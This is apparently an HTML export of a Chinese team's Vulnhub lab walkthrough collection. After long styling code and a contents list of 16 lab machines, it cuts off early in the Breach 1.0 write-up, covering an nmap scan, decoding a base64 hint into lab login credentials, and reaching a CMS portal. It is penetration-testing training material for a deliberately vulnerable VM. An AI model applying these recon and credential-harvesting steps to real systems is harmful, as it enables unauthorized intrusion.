Vulnhub靶场题解

Vulnhub简介

Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。网址:https://www.vulnhub.com

 

 

 

 

吧下面代码复制另存为后缀为.html文件打开就可以正常访问了

<!doctype html>
<html>
<head>
<meta charset='UTF-8'><meta name='viewport' content='width=device-width initial-scale=1'>
<title>Vulnhub靶场题解 - 红日安全团队</title><link href='https://fonts.googleapis.com/css?family=Open+Sans:400italic,700italic,700,400&subset=latin,latin-ext' rel='stylesheet' type='text/css' /><style type='text/css'>html {overflow-x: initial !important;}#write, body { height: auto; }
#write, #write h1, #write h2, #write h3, #write h4, #write h5, #write h6, #write ol, #write p, #write ul { position: relative; }
#write, #write h1, #write h2, #write h3, #write h4, #write h5, #write h6, #write p, #write pre { width: inherit; }
#write, pre { white-space: pre-wrap; }
.CodeMirror, .md-fences, table { text-align: left; }
.md-reset, a:active, a:hover { outline: 0px; }
.md-reset, .md-toc-item a { text-decoration: none; }
.MathJax_SVG, .md-reset { float: none; direction: ltr; }
:root { --bg-color:#ffffff; --text-color:#333333; }
html { font-size: 14px; background-color: var(--bg-color); color: var(--text-color); font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; -webkit-font-smoothing: antialiased; }
body { margin: 0px; padding: 0px; bottom: 0px; top: 0px; left: 0px; right: 0px; font-size: 1rem; line-height: 1.42857; overflow-x: hidden; background: inherit; }
a.url { word-break: break-all; }
.in-text-selection, ::selection { background: rgb(181, 214, 252); text-shadow: none; }
#write { margin: 0px auto; word-break: normal; word-wrap: break-word; padding-bottom: 70px; overflow-x: visible; }
.first-line-indent #write p .md-line { text-indent: 0px; }
.first-line-indent #write li, .first-line-indent #write p, .first-line-indent #write p .md-line:first-child { text-indent: 2em; }
.for-image #write { padding-left: 8px; padding-right: 8px; }
body.typora-export { padding-left: 30px; padding-right: 30px; }
@media screen and (max-width: 500px) {
  body.typora-export { padding-left: 0px; padding-right: 0px; }
  .CodeMirror-sizer { margin-left: 0px !important; }
  .CodeMirror-gutters { display: none !important; }
}
#write > blockquote:first-child, #write > div:first-child, #write > ol:first-child, #write > p:first-child, #write > pre:first-child, #write > table:first-child, #write > ul:first-child { margin-top: 30px; }
#write li > table:first-child { margin-top: -20px; }
img { max-width: 100%; vertical-align: middle; }
button, input, select, textarea { color: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; }
input[type="checkbox"], input[type="radio"] { line-height: normal; padding: 0px; }
*, ::after, ::before { box-sizing: border-box; }
h1 { font-size: 2rem; }
h2 { font-size: 1.8rem; }
h3 { font-size: 1.6rem; }
h4 { font-size: 1.4rem; }
h5 { font-size: 1.2rem; }
h6 { font-size: 1rem; }
p { -webkit-margin-before: 1rem; -webkit-margin-after: 1rem; -webkit-margin-start: 0px; -webkit-margin-end: 0px; }
.mathjax-block { margin-top: 0px; margin-bottom: 0px; -webkit-margin-before: 0px; -webkit-margin-after: 0px; }
.hidden { display: none; }
.md-blockmeta { color: rgb(204, 204, 204); font-weight: 700; font-style: italic; }
a { cursor: pointer; }
sup.md-footnote { padding: 2px 4px; background-color: rgba(238, 238, 238, 0.7); color: rgb(85, 85, 85); border-radius: 4px; }
#write input[type="checkbox"] { cursor: pointer; width: inherit; height: inherit; }
#write > figure:first-child { margin-top: 16px; }
figure { overflow-x: auto; margin: -8px 0px 0px -8px; max-width: calc(100% + 16px); padding: 8px; }
tr { break-inside: avoid; break-after: auto; }
thead { display: table-header-group; }
table { border-collapse: collapse; border-spacing: 0px; width: 100%; overflow: auto; break-inside: auto; }
.CodeMirror-line, .md-fences { break-inside: avoid; }
table.md-table td { min-width: 80px; }
.CodeMirror-gutters { border-right: 0px; background-color: inherit; margin-right: 4px; }
.CodeMirror-placeholder { opacity: 0.3; }
.CodeMirror pre { padding: 0px 4px; }
.CodeMirror-lines { padding: 0px; }
div.hr:focus { cursor: none; }
.md-fences { font-size: 0.9rem; display: block; overflow: visible; white-space: pre; background: inherit; position: relative !important; }
.md-diagram-panel { width: 100%; margin-top: 10px; text-align: center; padding-top: 0px; padding-bottom: 8px; overflow-x: auto; }
.md-fences .CodeMirror.CodeMirror-wrap { top: -1.6em; margin-bottom: -1.6em; }
.md-fences.mock-cm { white-space: pre-wrap; }
.show-fences-line-number .md-fences { padding-left: 0px; }
.show-fences-line-number .md-fences.mock-cm { padding-left: 40px; }
.footnotes { opacity: 0.8; font-size: 0.9rem; margin-top: 1em; margin-bottom: 1em; }
.footnotes + .footnotes { margin-top: 0px; }
.md-reset { margin: 0px; padding: 0px; border: 0px; vertical-align: top; background: 0px 0px; text-shadow: none; position: static; width: auto; height: auto; white-space: nowrap; cursor: inherit; -webkit-tap-highlight-color: transparent; line-height: normal; font-weight: 400; text-align: left; box-sizing: content-box; }
.md-toc-inner, a img, img a { cursor: pointer; }
li div { padding-top: 0px; }
blockquote { margin: 1rem 0px; }
li .mathjax-block, li p { margin: 0.5rem 0px; }
li { margin: 0px; position: relative; }
blockquote > :last-child { margin-bottom: 0px; }
blockquote > :first-child { margin-top: 0px; }
.footnotes-area { color: rgb(136, 136, 136); margin-top: 0.714rem; padding-bottom: 0.143rem; white-space: normal; }
@media print {
  body, html { border: 1px solid transparent; height: 99%; break-after: avoid; break-before: avoid; }
  #write { margin-top: 0px; border-color: transparent !important; }
  .typora-export * { -webkit-print-color-adjust: exact; }
  h1, h2, h3, h4, h5, h6 { break-after: avoid-page; orphans: 2; }
  p { orphans: 4; }
  html.blink-to-pdf { font-size: 13px; }
  .typora-export #write { padding-left: 1cm; padding-right: 1cm; padding-bottom: 0px; break-after: avoid; }
  .typora-export #write::after { height: 0px; }
  @page { margin: 20mm 0px; }
}
.footnote-line { white-space: pre-wrap; margin-top: 0.714em; font-size: 0.7em; }
pre.md-meta-block { font-size: 0.8rem; min-height: 0.8rem; white-space: pre-wrap; background: rgb(204, 204, 204); display: block; overflow-x: hidden; }
p > img:only-child { display: block; margin: auto; }
.md-line > .md-image:only-child, p > .md-image:only-child { display: inline-block; width: 100%; text-align: center; }
.mathjax-block:not(:empty)::after, .md-toc-content::after, .md-toc::after { display: none; }
#write .MathJax_Display { margin: 0.8em 0px 0px; }
.mathjax-block { white-space: pre; overflow: hidden; width: 100%; }
p + .mathjax-block { margin-top: -1.143rem; }
[contenteditable="true"]:active, [contenteditable="true"]:focus { outline: 0px; box-shadow: none; }
.md-task-list-item { position: relative; list-style-type: none; }
.task-list-item.md-task-list-item { padding-left: 0px; }
.md-task-list-item > input { position: absolute; top: 0px; left: 0px; margin-left: -1.2em; margin-top: calc(1em - 10px); }
.math { font-size: 1rem; }
.md-toc { min-height: 3.58rem; position: relative; font-size: 0.9rem; border-radius: 10px; }
.MathJax_SVG, .mathjax-block .MathJax_SVG_Display { text-indent: 0px; max-width: none; max-height: none; min-height: 0px; }
.md-toc-content { position: relative; margin-left: 0px; }
.md-toc-item { display: block; color: rgb(65, 131, 196); }
.md-toc-inner:hover { }
.md-toc-inner { display: inline-block; }
.md-toc-h1 .md-toc-inner { margin-left: 0px; font-weight: 700; }
.md-toc-h2 .md-toc-inner { margin-left: 2em; }
.md-toc-h3 .md-toc-inner { margin-left: 4em; }
.md-toc-h4 .md-toc-inner { margin-left: 6em; }
.md-toc-h5 .md-toc-inner { margin-left: 8em; }
.md-toc-h6 .md-toc-inner { margin-left: 10em; }
@media screen and (max-width: 48em) {
  .md-toc-h3 .md-toc-inner { margin-left: 3.5em; }
  .md-toc-h4 .md-toc-inner { margin-left: 5em; }
  .md-toc-h5 .md-toc-inner { margin-left: 6.5em; }
  .md-toc-h6 .md-toc-inner { margin-left: 8em; }
}
a.md-toc-inner { font-size: inherit; font-style: inherit; font-weight: inherit; line-height: inherit; }
.footnote-line a:not(.reversefootnote) { color: inherit; }
.md-attr { display: none; }
.md-fn-count::after { content: "."; }
code, pre, tt { font-family: var(--monospace); }
.md-comment { color: rgb(162, 127, 3); opacity: 0.8; font-family: var(--monospace); }
code { text-align: left; }
a.md-print-anchor { border-width: initial !important; border-style: none !important; border-color: initial !important; display: inline-block !important; position: absolute !important; width: 1px !important; right: 0px !important; outline: 0px !important; background: 0px 0px !important; text-decoration: initial !important; text-shadow: initial !important; }
.md-inline-math .MathJax_SVG .noError { display: none !important; }
.mathjax-block .MathJax_SVG_Display { text-align: center; margin: 1em 0px; position: relative; min-width: 100%; width: auto; display: block !important; }
.MathJax_SVG_Display, .md-inline-math .MathJax_SVG_Display { width: auto; margin: inherit; display: inline-block !important; }
.MathJax_SVG .MJX-monospace { font-family: monospace; }
.MathJax_SVG .MJX-sans-serif { font-family: sans-serif; }
.MathJax_SVG { display: inline; font-style: normal; font-weight: 400; line-height: normal; zoom: 90%; text-align: left; text-transform: none; letter-spacing: normal; word-spacing: normal; word-wrap: normal; white-space: nowrap; min-width: 0px; border: 0px; padding: 0px; margin: 0px; }
.MathJax_SVG * { transition: none; }
.os-windows.monocolor-emoji .md-emoji { font-family: "Segoe UI Symbol", sans-serif; }
.md-diagram-panel > svg, [lang="flow"] svg, [lang="mermaid"] svg { max-width: 100%; }
[lang="mermaid"] .node text { font-size: 1rem; }
table tr th { border-bottom: 0px; }
 
 
.CodeMirror, .CodeMirror-sizer { position: relative; }
.CodeMirror.cm-s-inner { background: inherit; }
.fences-no-line-wrapping .md-fences .CodeMirror { margin-top: -30px; }
.CodeMirror-scroll { overflow-y: hidden; overflow-x: auto; }
.CodeMirror-lines { padding: 4px 0px; }
.CodeMirror-gutter-filler, .CodeMirror-scrollbar-filler { background-color: rgb(255, 255, 255); }
.CodeMirror-scroll, .cm-s-inner .CodeMirror-activeline-background { background: inherit; }
.CodeMirror-linenumber { padding: 0px 3px 0px 5px; text-align: right; color: rgb(153, 153, 153); }
.cm-s-inner .cm-keyword { color: rgb(119, 0, 136); }
.cm-s-inner .cm-atom, .cm-s-inner.cm-atom { color: rgb(34, 17, 153); }
.cm-s-inner .cm-number { color: rgb(17, 102, 68); }
.cm-s-inner .cm-def { color: rgb(0, 0, 255); }
.cm-s-inner .cm-variable { color: rgb(0, 0, 0); }
.cm-s-inner .cm-variable-2 { color: rgb(0, 85, 170); }
.cm-s-inner .cm-variable-3 { color: rgb(0, 136, 85); }
.cm-s-inner .cm-string { color: rgb(170, 17, 17); }
.cm-s-inner .cm-property { color: rgb(0, 0, 0); }
.cm-s-inner .cm-operator { color: rgb(152, 26, 26); }
.cm-s-inner .cm-comment, .cm-s-inner.cm-comment { color: rgb(170, 85, 0); }
.cm-s-inner .cm-string-2 { color: rgb(255, 85, 0); }
.cm-s-inner .cm-meta, .cm-s-inner .cm-qualifier { color: rgb(85, 85, 85); }
.cm-s-inner .cm-builtin { color: rgb(51, 0, 170); }
.cm-s-inner .cm-bracket { color: rgb(153, 153, 119); }
.cm-s-inner .cm-tag { color: rgb(17, 119, 0); }
.cm-s-inner .cm-attribute { color: rgb(0, 0, 204); }
.cm-s-inner .cm-header, .cm-s-inner.cm-header { color: rgb(0, 0, 255); }
.cm-s-inner .cm-quote, .cm-s-inner.cm-quote { color: rgb(0, 153, 0); }
.cm-s-inner .cm-hr, .cm-s-inner.cm-hr { color: rgb(153, 153, 153); }
.cm-s-inner .cm-link, .cm-s-inner.cm-link { color: rgb(0, 0, 204); }
.cm-negative { color: rgb(221, 68, 68); }
.cm-positive { color: rgb(34, 153, 34); }
.cm-header, .cm-strong { font-weight: 700; }
.cm-del { text-decoration: line-through; }
.cm-em { font-style: italic; }
.cm-link { text-decoration: underline; }
.cm-error, .cm-invalidchar { color: red; }
.cm-constant { color: rgb(38, 139, 210); }
.cm-defined { color: rgb(181, 137, 0); }
div.CodeMirror span.CodeMirror-matchingbracket { color: rgb(0, 255, 0); }
div.CodeMirror span.CodeMirror-nonmatchingbracket { color: rgb(255, 34, 34); }
.CodeMirror { height: auto; overflow: hidden; }
.CodeMirror-scroll { margin-bottom: -30px; padding-bottom: 30px; height: 100%; outline: 0px; position: relative; box-sizing: content-box; }
.CodeMirror-gutter-filler, .CodeMirror-hscrollbar, .CodeMirror-scrollbar-filler, .CodeMirror-vscrollbar { position: absolute; z-index: 6; display: none; }
.CodeMirror-vscrollbar { right: 0px; top: 0px; overflow-x: hidden; overflow-y: scroll; }
.CodeMirror-hscrollbar { bottom: 0px; left: 0px; overflow-y: hidden; overflow-x: scroll; }
.CodeMirror-scrollbar-filler { right: 0px; bottom: 0px; }
.CodeMirror-gutter-filler { left: 0px; bottom: 0px; }
.CodeMirror-gutters { border-right: 1px solid rgb(221, 221, 221); background: inherit; white-space: nowrap; position: absolute; left: 0px; top: 0px; padding-bottom: 30px; z-index: 3; }
.CodeMirror-gutter { white-space: normal; height: 100%; box-sizing: content-box; padding-bottom: 30px; margin-bottom: -32px; display: inline-block; }
.CodeMirror-gutter-wrapper { position: absolute; z-index: 4; background: 0px 0px !important; border: none !important; }
.CodeMirror-gutter-background { position: absolute; top: 0px; bottom: 0px; z-index: 4; }
.CodeMirror-gutter-elt { position: absolute; cursor: default; z-index: 4; }
.CodeMirror-lines { cursor: text; }
.CodeMirror pre { border-radius: 0px; border-width: 0px; background: 0px 0px; font-family: inherit; font-size: inherit; margin: 0px; white-space: pre; word-wrap: normal; color: inherit; z-index: 2; position: relative; overflow: visible; }
.CodeMirror-wrap pre { word-wrap: break-word; white-space: pre-wrap; word-break: normal; }
.CodeMirror-code pre { border-right: 30px solid transparent; width: fit-content; }
.CodeMirror-wrap .CodeMirror-code pre { border-right: none; width: auto; }
.CodeMirror-linebackground { position: absolute; left: 0px; right: 0px; top: 0px; bottom: 0px; z-index: 0; }
.CodeMirror-linewidget { position: relative; z-index: 2; overflow: auto; }
.CodeMirror-wrap .CodeMirror-scroll { overflow-x: hidden; }
.CodeMirror-measure { position: absolute; width: 100%; height: 0px; overflow: hidden; visibility: hidden; }
.CodeMirror-measure pre { position: static; }
.CodeMirror div.CodeMirror-cursor { position: absolute; border-right: none; width: 0px; visibility: hidden; }
.CodeMirror-focused div.CodeMirror-cursor { visibility: inherit; }
.CodeMirror-selected { background: rgb(217, 217, 217); }
.CodeMirror-focused .CodeMirror-selected { background: rgb(215, 212, 240); }
.cm-searching { background: rgba(255, 255, 0, 0.4); }
@media print {
  .CodeMirror div.CodeMirror-cursor { visibility: hidden; }
}
.CodeMirror-lint-markers { width: 16px; }
.CodeMirror-lint-tooltip { background-color: infobackground; border: 1px solid rgb(0, 0, 0); border-radius: 4px; color: infotext; font-family: var(--monospace); overflow: hidden; padding: 2px 5px; position: fixed; white-space: pre-wrap; z-index: 10000; max-width: 600px; opacity: 0; transition: opacity 0.4s; font-size: 0.8em; }
.CodeMirror-lint-mark-error, .CodeMirror-lint-mark-warning { background-position: left bottom; background-repeat: repeat-x; }
.CodeMirror-lint-mark-error { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAQAAAADCAYAAAC09K7GAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9sJDw4cOCW1/KIAAAAZdEVYdENvbW1lbnQAQ3JlYXRlZCB3aXRoIEdJTVBXgQ4XAAAAHElEQVQI12NggIL/DAz/GdA5/xkY/qPKMDAwAADLZwf5rvm+LQAAAABJRU5ErkJggg=="); }
.CodeMirror-lint-marker-error, .CodeMirror-lint-marker-warning { background-position: center center; background-repeat: no-repeat; cursor: pointer; display: inline-block; height: 16px; width: 16px; vertical-align: middle; position: relative; }
.CodeMirror-lint-message-error, .CodeMirror-lint-message-warning { padding-left: 18px; background-position: left top; background-repeat: no-repeat; }
.CodeMirror-lint-marker-error, .CodeMirror-lint-message-error { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAAHlBMVEW7AAC7AACxAAC7AAC7AAAAAAC4AAC5AAD///+7AAAUdclpAAAABnRSTlMXnORSiwCK0ZKSAAAATUlEQVR42mWPOQ7AQAgDuQLx/z8csYRmPRIFIwRGnosRrpamvkKi0FTIiMASR3hhKW+hAN6/tIWhu9PDWiTGNEkTtIOucA5Oyr9ckPgAWm0GPBog6v4AAAAASUVORK5CYII="); }
.CodeMirror-lint-marker-warning, .CodeMirror-lint-message-warning { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAANlBMVEX/uwDvrwD/uwD/uwD/uwD/uwD/uwD/uwD/uwD6twD/uwAAAADurwD2tQD7uAD+ugAAAAD/uwDhmeTRAAAADHRSTlMJ8mN1EYcbmiixgACm7WbuAAAAVklEQVR42n3PUQqAIBBFUU1LLc3u/jdbOJoW1P08DA9Gba8+YWJ6gNJoNYIBzAA2chBth5kLmG9YUoG0NHAUwFXwO9LuBQL1giCQb8gC9Oro2vp5rncCIY8L8uEx5ZkAAAAASUVORK5CYII="); }
.CodeMirror-lint-marker-multiple { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAcAAAAHCAMAAADzjKfhAAAACVBMVEUAAAAAAAC/v7914kyHAAAAAXRSTlMAQObYZgAAACNJREFUeNo1ioEJAAAIwmz/H90iFFSGJgFMe3gaLZ0od+9/AQZ0ADosbYraAAAAAElFTkSuQmCC"); background-repeat: no-repeat; background-position: right bottom; width: 100%; height: 100%; }
 
 
:root { --side-bar-bg-color: #fafafa; --control-text-color: #777; }
@font-face { font-family: "Open Sans"; font-style: normal; font-weight: normal; src: local("Open Sans Regular"), url("./github/400.woff") format("woff"); }
@font-face { font-family: "Open Sans"; font-style: italic; font-weight: normal; src: local("Open Sans Italic"), url("./github/400i.woff") format("woff"); }
@font-face { font-family: "Open Sans"; font-style: normal; font-weight: bold; src: local("Open Sans Bold"), url("./github/700.woff") format("woff"); }
@font-face { font-family: "Open Sans"; font-style: italic; font-weight: bold; src: local("Open Sans Bold Italic"), url("./github/700i.woff") format("woff"); }
html { font-size: 16px; }
body { font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; color: rgb(51, 51, 51); line-height: 1.6; }
#write { max-width: 860px; margin: 0px auto; padding: 20px 30px 100px; }
#write > ul:first-child, #write > ol:first-child { margin-top: 30px; }
body > :first-child { margin-top: 0px !important; }
body > :last-child { margin-bottom: 0px !important; }
a { color: rgb(65, 131, 196); }
h1, h2, h3, h4, h5, h6 { position: relative; margin-top: 1rem; margin-bottom: 1rem; font-weight: bold; line-height: 1.4; cursor: text; }
h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor { text-decoration: none; }
h1 tt, h1 code { font-size: inherit; }
h2 tt, h2 code { font-size: inherit; }
h3 tt, h3 code { font-size: inherit; }
h4 tt, h4 code { font-size: inherit; }
h5 tt, h5 code { font-size: inherit; }
h6 tt, h6 code { font-size: inherit; }
h1 { padding-bottom: 0.3em; font-size: 2.25em; line-height: 1.2; border-bottom: 1px solid rgb(238, 238, 238); }
h2 { padding-bottom: 0.3em; font-size: 1.75em; line-height: 1.225; border-bottom: 1px solid rgb(238, 238, 238); }
h3 { font-size: 1.5em; line-height: 1.43; }
h4 { font-size: 1.25em; }
h5 { font-size: 1em; }
h6 { font-size: 1em; color: rgb(119, 119, 119); }
p, blockquote, ul, ol, dl, table { margin: 0.8em 0px; }
li > ol, li > ul { margin: 0px; }
hr { height: 4px; padding: 0px; margin: 16px 0px; background-color: rgb(231, 231, 231); border-width: 0px 0px 1px; border-style: none none solid; border-top-color: initial; border-right-color: initial; border-left-color: initial; border-image: initial; overflow: hidden; box-sizing: content-box; border-bottom-color: rgb(221, 221, 221); }
body > h2:first-child { margin-top: 0px; padding-top: 0px; }
body > h1:first-child { margin-top: 0px; padding-top: 0px; }
body > h1:first-child + h2 { margin-top: 0px; padding-top: 0px; }
body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child { margin-top: 0px; padding-top: 0px; }
a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 { margin-top: 0px; padding-top: 0px; }
h1 p, h2 p, h3 p, h4 p, h5 p, h6 p { margin-top: 0px; }
li p.first { display: inline-block; }
ul, ol { padding-left: 30px; }
ul:first-child, ol:first-child { margin-top: 0px; }
ul:last-child, ol:last-child { margin-bottom: 0px; }
blockquote { border-left: 4px solid rgb(221, 221, 221); padding: 0px 15px; color: rgb(119, 119, 119); }
blockquote blockquote { padding-right: 0px; }
table { padding: 0px; word-break: initial; }
table tr { border-top: 1px solid rgb(204, 204, 204); margin: 0px; padding: 0px; }
table tr:nth-child(2n) { background-color: rgb(248, 248, 248); }
table tr th { font-weight: bold; border-width: 1px 1px 0px; border-top-style: solid; border-right-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); border-image: initial; border-bottom-style: initial; border-bottom-color: initial; text-align: left; margin: 0px; padding: 6px 13px; }
table tr td { border: 1px solid rgb(204, 204, 204); text-align: left; margin: 0px; padding: 6px 13px; }
table tr th:first-child, table tr td:first-child { margin-top: 0px; }
table tr th:last-child, table tr td:last-child { margin-bottom: 0px; }
.CodeMirror-gutters { border-right: 1px solid rgb(221, 221, 221); }
.md-fences, code, tt { border: 1px solid rgb(221, 221, 221); background-color: rgb(248, 248, 248); border-radius: 3px; font-family: Consolas, "Liberation Mono", Courier, monospace; padding: 2px 4px 0px; font-size: 0.9em; }
.md-fences { margin-bottom: 15px; margin-top: 15px; padding: 8px 1em 6px; }
.md-task-list-item > input { margin-left: -1.3em; }
@media screen and (min-width: 914px) {
}
@media print {
  html { font-size: 13px; }
  table, pre { break-inside: avoid; }
  pre { word-wrap: break-word; }
}
.md-fences { background-color: rgb(248, 248, 248); }
#write pre.md-meta-block { padding: 1rem; font-size: 85%; line-height: 1.45; background-color: rgb(247, 247, 247); border: 0px; border-radius: 3px; color: rgb(119, 119, 119); margin-top: 0px !important; }
.mathjax-block > .code-tooltip { bottom: 0.375rem; }
#write > h3.md-focus::before { left: -1.5625rem; top: 0.375rem; }
#write > h4.md-focus::before { left: -1.5625rem; top: 0.285714rem; }
#write > h5.md-focus::before { left: -1.5625rem; top: 0.285714rem; }
#write > h6.md-focus::before { left: -1.5625rem; top: 0.285714rem; }
.md-image > .md-meta { border-radius: 3px; font-family: Consolas, "Liberation Mono", Courier, monospace; padding: 2px 0px 0px 4px; font-size: 0.9em; color: inherit; }
.md-tag { color: inherit; }
.md-toc { margin-top: 20px; padding-bottom: 20px; }
.sidebar-tabs { border-bottom: none; }
#typora-quick-open { border: 1px solid rgb(221, 221, 221); background-color: rgb(248, 248, 248); }
#typora-quick-open-item { background-color: rgb(250, 250, 250); border-color: rgb(254, 254, 254) rgb(229, 229, 229) rgb(229, 229, 229) rgb(238, 238, 238); border-style: solid; border-width: 1px; }
#md-notification::before { top: 10px; }
.on-focus-mode blockquote { border-left-color: rgba(85, 85, 85, 0.12); }
header, .context-menu, .megamenu-content, footer { font-family: "Segoe UI", Arial, sans-serif; }
.file-node-content:hover .file-node-icon, .file-node-content:hover .file-node-open-state { visibility: visible; }
.mac-seamless-mode #typora-sidebar { background-color: var(--side-bar-bg-color); }
.md-lang { color: rgb(180, 101, 77); }
.html-for-mac .context-menu { --item-hover-bg-color: #E6F0FE; }
 
 
 
 
 
 .typora-export p, .typora-export .footnote-line {white-space: normal;} 
</style>
</head>
<body class='typora-export os-windows' >
<div  id='write'  class = 'is-node'><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/vulhub%E9%9D%B6%E5%9C%BA_meitu_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n7001' class='md-header-anchor '></a> </h2><p> </p><p> </p><h2><a name='header-n7006' class='md-header-anchor '></a>目录</h2><h4><a name='header-n7007' class='md-header-anchor '></a>Vulnhub渗透测试练习(一)-------------------------------Breach1.0</h4><h4><a name='header-n7008' class='md-header-anchor '></a>Vulnhub渗透测试练习(二) ------------------------------Billu_b0x</h4><h4><a name='header-n7009' class='md-header-anchor '></a>Vulnhub渗透测试练习(三) -------------------------------Bulldog1</h4><h4><a name='header-n7010' class='md-header-anchor '></a>Vulnhub渗透测试练习(四)---------------------------------Acid</h4><h4><a name='header-n7011' class='md-header-anchor '></a>Vulnhub渗透测试练习(五)---------------------------------LazysysAdmin-1</h4><h4><a name='header-n7012' class='md-header-anchor '></a>Vulnhub渗透测试练习(六)---------------------------------Freshly</h4><h4><a name='header-n7013' class='md-header-anchor '></a>Vulnhub渗透测试练习(七)---------------------------------FristiLeaks v1.3</h4><h4><a name='header-n7014' class='md-header-anchor '></a>Vulnhub渗透测试练习(八)---------------------------------The Ether</h4><h4><a name='header-n7015' class='md-header-anchor '></a>Vulnhub渗透测试练习(九)---------------------------------zico2</h4><h4><a name='header-n7016' class='md-header-anchor '></a>Vulnhub渗透测试练习(十)---------------------------------Quaoar</h4><h4><a name='header-n7017' class='md-header-anchor '></a>Vulnhub渗透测试练习(十一)---------------------------------SickOs 1.1</h4><h4><a name='header-n7018' class='md-header-anchor '></a>Vulnhub渗透测试练习(十二)---------------------------------BSides-Vancouver-2018-Workshop</h4><h4><a name='header-n7019' class='md-header-anchor '></a>Vulnhub渗透测试练习(十三)---------------------------------Kioptrix 1</h4><h4><a name='header-n7020' class='md-header-anchor '></a>Vulnhub渗透测试练习(十四)----------------------------------Zico2</h4><h4><a name='header-n7021' class='md-header-anchor '></a>Vulnhub渗透测试练习(十五)----------------------------------Kioptrix 3</h4><h4><a name='header-n7022' class='md-header-anchor '></a>Vulnhub渗透测试练习(十六)----------------------------------Kioptrix 4</h4><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><h1><a name='header-n7037' class='md-header-anchor '></a>Vulnhub靶场题解 - 红日安全团队</h1><h2><a name='header-n7038' class='md-header-anchor '></a>Vulnhub简介</h2><p>Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。网址:<a href='https://www.vulnhub.com' target='_blank' class='url'>https://www.vulnhub.com</a></p><h1><a name='header-n7041' class='md-header-anchor '></a>第一节 Breach1.0</h1><h2><a name='header-n7042' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n7044' class='md-header-anchor '></a>下载链接</h3><p><a href='https://download.vulnhub.com/breach/Breach-1.0.zip' target='_blank' class='url'>https://download.vulnhub.com/breach/Breach-1.0.zip</a></p><h3><a name='header-n7047' class='md-header-anchor '></a>靶机说明</h3><p>Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。</p><p>VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。作者期待大家写出文章,特别是通过非预期的方式获取root权限。</p><h3><a name='header-n7052' class='md-header-anchor '></a>目标</h3><p>Boot to root:获得root权限,查看flag。</p><h3><a name='header-n7055' class='md-header-anchor '></a>运行环境</h3><ul><li>靶机:网络连接方式设置为主机模式(host-only),静态IP是192.168.110.140。</li><li>攻击机:同网段下有Windows攻击机(物理机),IP地址:192.168.110.220,安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Python2.7、JDK、DirBuster、AWVS、Nessus等渗透工具,也可以使用Kali Linux攻击机。</li></ul><h2><a name='header-n7063' class='md-header-anchor '></a>信息收集</h2><ul><li>端口服务识别</li></ul><p>启动Breach1.0虚拟机,由于IP已知,使用nmap扫描端口,并做服务识别和深度扫描(加-A参数),扫描结果保存到txt文件,命令:</p><p><code>nmap -v -A 192.168.110.140 -oN Breach.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现端口几乎全开放了,显然是有问题,虚拟机对端口扫描做了一些防护措施,直接访问80端口,进入web首页:<code>http://192.168.110.140/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7078' class='md-header-anchor '></a>漏洞挖掘</h2><h3><a name='header-n7079' class='md-header-anchor '></a>0x01:查看首页源码,解码得到密码</h3><p>(1) 查看首页源码,发现提示:<code>Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo</code> 这是一串base64编码。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 将其复制到Burpsuit Decoder进行base64解码,解密后发现还是base64编码,继续base64解码,得到<code>pgibbons:damnitfeel$goodtobeagang$ta</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7088' class='md-header-anchor '></a>0x02:登录cms,查看邮件,下载包含SSL证书的密钥库keystore文件</h3><p>(1) 点击首页的图片,进入<code>initech.html</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 点击initech.html左边的<code>Employee portal</code>进入到<code>http://192.168.110.140/impresscms/user.php</code> 